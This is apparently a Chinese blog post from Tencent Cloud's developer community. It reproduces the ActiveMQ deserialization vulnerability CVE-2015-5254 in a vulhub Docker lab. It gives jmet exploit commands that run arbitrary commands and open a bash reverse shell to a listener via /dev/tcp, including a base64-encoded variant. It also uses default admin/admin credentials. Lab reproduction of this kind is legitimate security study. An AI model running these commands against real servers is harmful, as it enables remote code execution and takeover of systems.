前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >ActiveMQ反序列化漏洞_CVE-2015-5254

ActiveMQ反序列化漏洞_CVE-2015-5254

作者头像
UzJu@菜菜狗
发布2022-04-25 20:49:06
3980
发布2022-04-25 20:49:06
举报
文章被收录于专栏:UzJu和菜菜狗UzJu和菜菜狗

0x00 安装docker-compose

Ubuntu安装docker-compose

使用DaoCloud源下载

代码语言:javascript
复制
sudo curl -L https://get.daocloud.io/docker/compose/releases/download/1.22.0/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose

设置权限

代码语言:javascript
复制
sudo chmod +x /usr/local/bin/docker-compose 
image-20211227191401501
image-20211227191401501

0x01 启动漏洞环境

1、执行touch命令

首先将漏洞环境全部Git到服务器上

代码语言:javascript
复制
git clone https://github.com/vulhub/vulhub.git 

随后进入到对应的目录即可

代码语言:javascript
复制
docker-compose up -d 

随后会开始下载

image-20211227191520167
image-20211227191520167
image-20211227191636221
image-20211227191636221

随后可以看到漏洞环境已经启动成功

0x02 漏洞复现

下载提供的jmet进行漏洞利用

代码语言:javascript
复制
https://github.com/matthiaskaiser/jmet/releases/tag/0.1. 

随后执行

代码语言:javascript
复制
java -jar jmet-0.1.-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME IP  

Tips: 如果使用的是云服务器,需要对应提供商后台放通安全组

image-20211227194401739
image-20211227194401739

随后访问WEB页面

http://ip:8161/admin/browse.jsp?JMSDestination=event

账号为admin 密码为admin

image-20211227194525850
image-20211227194525850

这里可以看到有一个事件,点击这个事件即可

image-20211227194646696
image-20211227194646696

可以看到已经执行了命令,新建了一个success文件

2、反弹shell

执行命令如下

值得注意的是,关于bash反弹shell的原理,有一篇文章非常推荐 https://www.cnblogs.com/bonelee/p/11021996.html

代码语言:javascript
复制
java -jar jmet-0.1.-all.jar -Q event -I ActiveMQ -s -Y "bash -i >& /dev/tcp/ip/1234 0>&1" -Yp ROME ip  

或者进行base编码

代码语言:javascript
复制
java -jar jmet-0.1.-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,base64}|{base64,-d}|{bash,-i}" -Yp ROME ip  
image-20211227195020592
image-20211227195020592

访问WEB页面,我们可以看到新增了一个事件,点击事件即可,不过再次之前,我们需要使用nc监听1234端口

image-20211227195154148
image-20211227195154148
代码语言:javascript
复制
nc -lvp  
image-20211227225744180
image-20211227225744180

在点击事件后,我们成功获取到shell

image-20211227225838105
image-20211227225838105

0x03 参考

1、https://github.com/vulhub/vulhub/blob/master/activemq/CVE-2015-5254/README.zh-cn.md

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 0x00 安装docker-compose
  • 0x01 启动漏洞环境
    • 1、执行touch命令
    • 0x02 漏洞复现
      • 2、反弹shell
      • 0x03 参考
      相关产品与服务
      容器镜像服务
      容器镜像服务(Tencent Container Registry,TCR)为您提供安全独享、高性能的容器镜像托管分发服务。您可同时在全球多个地域创建独享实例,以实现容器镜像的就近拉取,降低拉取时间,节约带宽成本。TCR 提供细颗粒度的权限管理及访问控制,保障您的数据安全。
      领券
      问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档